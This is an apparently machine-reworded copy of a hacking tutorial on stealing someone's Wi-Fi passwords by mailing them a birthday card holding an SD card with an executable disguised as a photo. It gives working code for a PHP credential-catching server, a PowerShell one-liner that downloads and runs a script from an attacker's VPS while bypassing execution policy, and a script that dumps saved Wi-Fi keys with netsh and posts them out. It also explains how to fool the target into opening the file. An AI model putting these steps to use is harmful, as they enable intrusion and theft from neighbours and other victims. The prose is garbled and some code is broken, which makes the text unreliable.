3 weeks ago

How to Hack Anyone’s Wi-Fi Password Using a Birthday Card, Part 1 (Creating the Payload) « Null Byte :: WonderHowTo

With an ordinary birthday card, we can introduce a physical device which contains malicious files into someone’s home as well as also also deceive them into inserting the device into a computer.

In my last series, we used a Post-the idea note to trick a neighbor into visiting a website that will we control. This particular kind of attack required a lot of reconnaissance to successfully identify the neighbor’s name. the idea also required the target user to manually download a file to their computer. The additional potential downside to the attack is usually that will the target may become aware that will they’re the center of attention.

We generally want to compromise a target in as few steps as possible, so asking our intended target to visit a website as well as also also download a file as well as also also open the file might be a stretch depending on how technically savvy they are.

Understanding This particular Greeting Card Attack

Let’s first take a look at the attack scenario overview to better understand how This particular hack works. Our goal is usually to social engineer someone into inserting an SD card into a computer. This particular can easily be done against our neighbors next door. When the fake “photo” we make on the SD card is usually opened, our payload will execute, collect the device Wi-Fi credentials, as well as also also send the data to a server that will we control.

However, not all computers come equipped with SD card slots, as well as also also not everyone has an external card reader or digital camera that will can act as one. the idea’s certainly possible to substitute the SD card using a USB flash drive, although the idea’s not unusual to assume there are pictures on an SD card as all well-known digital cameras use them.

inside the first part of This particular series, we’ll start using a bit of hardware reconnaissance. the idea’s always important to do some kind of hardware recon before creating a payload. This particular will help us decide what kind of operating system we’re most likely up against. Then, we’ll create a payload on an SD card as well as also also set up a Virtual Private Server (VPS) to receive the Wi-Fi credentials.

inside the second part of This particular tutorial, we’ll convert the payload to an executable as well as also also modify the icon to make the idea appear to be a normal JPG image. When that will’s done, we’ll talk about inscribing a greeting card with an enticing note to trick the target into opening files on the SD card, then discuss when as well as also also how to deliver the card, as well as protections you can utilize to make sure you don’t fall victim to This particular attack.

The real-world applications with This particular kind of attack are limitless. Using a greeting card or any kind of personalized delivery system to social engineer a target into inserting a device into their computer can be used against major corporate companies, little businesses, as well as also also average everyday computer users. Last month, Taco Bell showed how a bare manila envelope was enough to get someone to insert a USB drive into their computer, although we’re going to have some fun here.

Step 1: Discover Their Hardware Information

Identifying devices connected to the target wireless network is usually important to the success of This particular attack as well as also also has been covered many times on Null Byte before. I suggest using the Airodump-ng method I showed inside the Post-the idea note hack, although you can also use the Kismet method to monitor hardware as well as also also enumerate operating systems connecting to the network. Once you have some MAC addresses, you just need to check them online to see what manufacturers they match up with.

Step 2: Find the Right Storage Device

For the payload used in This particular tutorial, a little 128 MB SD card will be more than adequate. If you’re using the social-engineering method in This particular article although are opting to use your own custom payload type, be sure to use an SD card appropriately sized to meet your needs. If you’re using a USB flash drive, 1 GB would likely be enough, if you can even find one that will little by itself.

When testing This particular hack, I used a very cheap as well as also also generic microSD card which was collecting dust on my desk. Remember, we’ll never use or see This particular SD card again so don’t break the bank trying to get something high-end.

If you believe your target is usually tech-savvy as well as also also would likely understand the difference between a cheap as well as also also high-end SD card, you won’t be able to convince them there’s an interesting 4K video on a 128 MB card. the idea’s just not possible. In that will case, you might have to invest in something higher quality to keep your imaginary social engineering scenario inside the realm of probable. Also, if you use a microSD card, as I did, remember to include an SD card adapter as shown inside the image below.

Image by tokyoneon/Null Byte

MicroSD cards are smaller as well as also also most computers as well as also also laptops don’t support microSD slots, so be sure to include an adapter. Cameras as well as also also smartphones will likely have a microSD card slot, although these are not our target devices, though, they can be used as an impromptu card reader, though the idea’s unlikely they would likely be used that will way.

Step 3: Give the Storage Device a Unique Name

When you insert the SD card or USB drive into your computer for the 1st time, the idea will likely be named automatically to something generic. Rename your storage device to something very unique like “SanDisk07595,” “HAPPY_BDAY,” or something relevant to what you will write inside the greeting card. This particular will allow the payload to easily locate the drive letter of the storage device when the idea’s inserted into a computer.

If the storage device name is usually too generic like “SD,” as well as also also there’s already a device named “SD” connected to the target computer, the idea will cause complications when executing the payload. Be sure to give the SD card a memorable unique name.

In Windows, you can change the name of connected SD card or USB drive by right-clicking on the device as well as also also clicking “Rename.” On a Linux system, open up the “Disks” application, select the drive, click on the cogs icon, then “Edit Filesystem.” with This particular tutorial, I’ll be using images of cats, so I’ll name my SD card “CATZ.”

Step 4: Set Up Your VPS

In order to get the Wi-Fi credentials via our payload that will we’re creating, we’ll need a VPS to receive as well as also also store the data. There are plenty of VPS providers available across the web, such as OVH, VPSdime, VPS.net, as well as also also Vultr, although I’ll be using DigitalOcean. If you’re more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS using your preferred provider.

DigitalOcean’s cheapest $5/month plan will work just fine with This particular hack. To connect to your brand new DigitalOcean server, enter the below ssh command into a terminal window.

ssh root@Your-VPS-IP-Here

right now that will we have our VPS up as well as also also running, we’ll need to install PHP. This particular will allow us to create a simple PHP server to receive or “catch” the credentials after they’ve been sent via the compromised computer.

To install PHP, run the apt-get command below.

sudo apt-get update && sudo apt-get install php

Some distributions force install Apache along with PHP, so be sure to stop any web servers that will might be running after installing PHP.

sudo apachectl stop

With that will done, we can start our PHP server. We’ll need This particular server running 24/7 to host our payload as well as also also receive the Wi-Fi credentials when someone opens a file on the SD card or USB drive. To start, make a directory called “phpServer” using the below mkdir command.

mkdir phpServer

Then, we’ll change into the phpServer directory using the cd command, as well as also also create a file called “index.php” using nano.

cd phpServer
nano index.php

We’ll then paste the below PHP script into the nano terminal. Once that will’s done, to save as well as also also exit the nano terminal, press Ctrl + X, then Y, then Enter.

$file = $_SERVER’REMOTE_ADDR’ . “_” . date(“YmdHisms”) . “.credz”;
file_put_contents($file, file_get_contents(“php://input”));

This particular is usually a very simple PHP server as well as also also you don’t need to modify just one line for the idea to work. When our payload is usually executed on the compromised device, the idea will send the Wi-Fi credentials to This particular PHP server as well as also also be automatically saved to a “.credz” text file.

To start the PHP server, use the below command.

sudo php -S &

The -S tells PHP to start a web server, while tells PHP to host the server on every interface on the VPS. Doing This particular will allow any device inside the earth to access files hosted on our PHP server. The 80 is usually the listening port number. By default, all web server as well as also also browsers use port 80 with HTTP servers. To keep the server via stopping when we kill our SSH connection, we’ll use & at the end of the command to tell the terminal to start the PHP server to a background process. This particular is usually the quick as well as also also dirty way of keeping our server online long after we close our SSH session.

To verify your PHP server is usually working, you can use the below cURL command via any Unix-like computer inside the earth.

curl –data “tokyoneon was here!” http://Your-VPS-IP-Here/index.php

The –data argument will send the “tokyoneon was here!” text to the PHP server similar to how the payload sends Wi-Fi credentials. Of course, This particular can say anything you want. After you run the cURL command, there should be a newly created file inside the phpServer directory. Use the cat command to read the file contents as I did inside the above screenshot.

that will’s as far as we’ll go with the VPS for right now. We’ll come back in a bit, as we need to save the payload to the phpServer directory.

Step 5: Understand How the Payload Will Work

Let’s begin talking about the payload as well as also also have a look at what the target user will see when they view content on the SD card or USB flash drive enclosed inside the greeting card package. One of the “fatcat” photos inside the below GIF is usually a malicious file I created as well as also also modified to appear as a normal photo. Can you tell which file is usually a real photo as well as also also which is usually a payload?

Cat image found at Flickr by Charles Nadeau (CC BY 2.0).

Clicking on either the real cat photo or the payload will cause the cat photo to open. The Windows operating system, going as far back as Windows XP, hides file extensions by default. At a glance, the idea’s not possible to determine whether the files we’re looking at are actually image types or executables. This particular is usually possibly one of the greatest design flaws of the Windows operating system as well as also also a security issue that will may never be properly addressed.

the idea’s possible to change the default file manager structure, however. Viewing the files using the “Details” or “Content” structure will show one of the images as an application. The 6 additional file manager layouts will not display information that will would likely indicate the executable is usually not actually an image. Even still, some people might not even pay attention to the file types being displayed right in front of them.

What is usually PowerShell?

PowerShell is usually a scripting language that will Microsoft developed to help the idea professionals configure systems as well as also also automate administrative tasks. Hackers have been using as well as also also abusing PowerShell to achieve their goals since 2006 when the idea was introduced into the Windows XP as well as also also Vista operating systems.

The executables (or fake photos) on the SD card or USB drive will contain “Stage 1” of the attack. The first stage is usually a simple PowerShell one-liner that will invokes an HTTP request as well as also also downloads the larger PowerShell script (“Stage 2”) via our VPS. The larger script is usually the actual payload that will grabs Wi-Fi passwords as well as also also sends them to our VPS.

1. What the Stage 1 Script Looks Like

Here’s what the “Stage 1” script looks like, the one that will will be loaded onto the storage device that will the target will receive:

powershell -ExecutionPolicy Bypass “IEX (brand new-Object Net.WebClient).DownloadString(‘http://YOUR-VPS-IP-HERE/payload.ps1’);”

the idea’s very simple as well as also also little. All the idea does is usually fetch as well as also also automatically execute the larger PowerShell script being hosted on our VPS.

Windows operating systems sometimes have restrictive PowerShell execution policies which can cause our scripts to fail. This particular creates a little obstacle for hackers as well as also also systems administrators alike. Fortunately, there are many ways of bypassing This particular. The -ExecutionPolicy Bypass argument used inside the “Stage 1” PowerShell script will allow us to easily bypass any execution policies enabled on the target device.

2. What the Stage 2 Script Looks Like

Here’s what the larger, “Stage 2” script looks like:

Add-Type -AssemblyName System.Web;


$SDname = (gwmi win32_volume -f ‘label=”SD-CARD-NAME-HERE”’).Name;
Invoke-Item -Path (“$SDname” + “REAL-IMAGE-NAME-HERE.png”);

Foreach ($path in [System.IO.Directory]::EnumerateFiles(“C:ProgramDataMicrosoftWlansvcProfiles”,”*.xml”,”AllDirectories”)) {

Try {
$oXml = brand new-Object System.XML.XMLDocument;
$ssid = $oXml.WLANProfile.SSIDConfig.SSID.name;
$netinfo = netsh.exe wlan show profiles name=”$ssid” key=clear;
$pass = (($netinfo | Select-String -Pattern “Key Content”) -split “:”)1.Trim();
$sendData += “ESSID: ” + ($ssid) + “`n” + “PASSWORD: ” + ($pass) + “`n`n”;
} Catch {}


Invoke-WebRequest -Uri $yourVPS -Method ‘POST’ -Body $sendData;

Step 6: Create the Stage 2 Script on Your VPS

We’ll go over what the “Stage 2” script does in moment although first we’ll need to save This particular PowerShell payload to the phpServer directory we created earlier. SSH back into your VPS as well as also also cd back into your phpServer directory.

ssh root@Your-Server-IP-Address
cd phpServer

You can use nano again to create a file called “payload.ps1.”

nano payload.ps1

Before closing as well as also also saving the nano terminal, there are 3 lines you’ll need to modify:

  1. Change “YOUR-VPS-IP-HERE” to the actual IP address of your VPS. This particular will tell the PowerShell payload where to send the Wi-Fi credentials after they’ve been discovered.
  2. Change “SD-CARD-NAME-HERE” to the name of your SD card or USB drive. I named my SD card “CATZ.” This particular is usually the line of PowerShell that will searches the target computer for the drive letter belonging to your storage device.
  3. Change “REAL-IMAGE-NAME-HERE.png” to the file name of an actual image on the root of the SD card or USB flash drive. This particular will cause the real image to open when the payload is usually opened. This particular step isn’t absolutely necessary, although the idea will certainly help diminish suspicion when someone clicks on the payload. If you want to skip This particular step, you’ll have to remove the 2 lines of the PowerShell script that will look for the storage device name as well as also also opens the image.

To save as well as also also exit the nano terminal, press Ctrl + X, then Y, then Enter. You should right now have “payload.ps1” as well as also also “index.php” files in your phpServer directory.

What the Stage 2 Script Actually Does

Let’s reiterate what the “Stage 2” PowerShell script will do, just to make sure the idea’s completely clear.

First, the idea will find the drive letter of the SD card as well as also also open a real image on the card. Doing This particular will prevent the target user via becoming suspicious of images that will don’t actually open.

Then, the PowerShell script will loop through all of the Wi-Fi network SSID names stored on the computer (found inside the XML documents inside the “C:ProgramDataMicrosoftWlansvcProfiles” directory) as well as also also run the netsh command for each SSID to pull the Wi-Fi passwords in plain text (labeled “Key Content”). More on This particular inside the second part of This particular series.

Last, the idea parses the netsh output text as well as also also takes the discovered Wi-Fi SSIDs as well as also also passwords, concatenates them into the “$sendData” string, as well as also also sends them to the PHP server running on our VPS.

To look under the hood at how the netsh command is usually used to get us the plain-text passwords, let’s take a second to look at its output. If you’re using a Windows computer right right now, you can type the below netsh command into a cmd terminal to view your own stored wireless passwords.

netsh wlan show profiles name=”<your wifi router’s SSID name>” key=clear

The netsh command will produce a bunch of information related to the Wi-Fi network, although most of the idea is usually useless to us. Scroll down a bit until you see the “Key Content” line which shows the Wi-Fi password in plain text. Below is usually an example screenshot of the netsh command’s output:

You’ll notice our “Stage 2” PowerShell script parses This particular text by using “Select-String -Pattern” to look for the line that will contains the text “Key Content,” then splits its value on the colon (“:”), takes the second value via the split array with the “1” (remember, the first value in an array is usually zero), as well as also also finally, calls “.Trim()” to remove any white-space characters via the left or the right to get the final value.

Stay Tuned for Part 2 …

right now that will we contain the SD card (or USB flash drive, if you went that will route), the PHP server set up on our VPS, as well as also also PowerShell “Stage 2” payload ready to go, we can begin converting the “Stage 1” PowerShell script to an executable as well as also also deliver the greeting card to our intended target.

Cover image as well as also also screenshots by tokyoneon/Null Byte

Don’t Miss: How to Hack Your Neighbor using a Post-the idea Note

More Info: How to Use Airodump-ng to Find Hardware Information

Don’t Miss: Getting started out with Post-Exploitation of Windows Hosts Using PowerShell Empire

Leave a Comment

Your email address will not be published. Required fields are marked *

4 × three =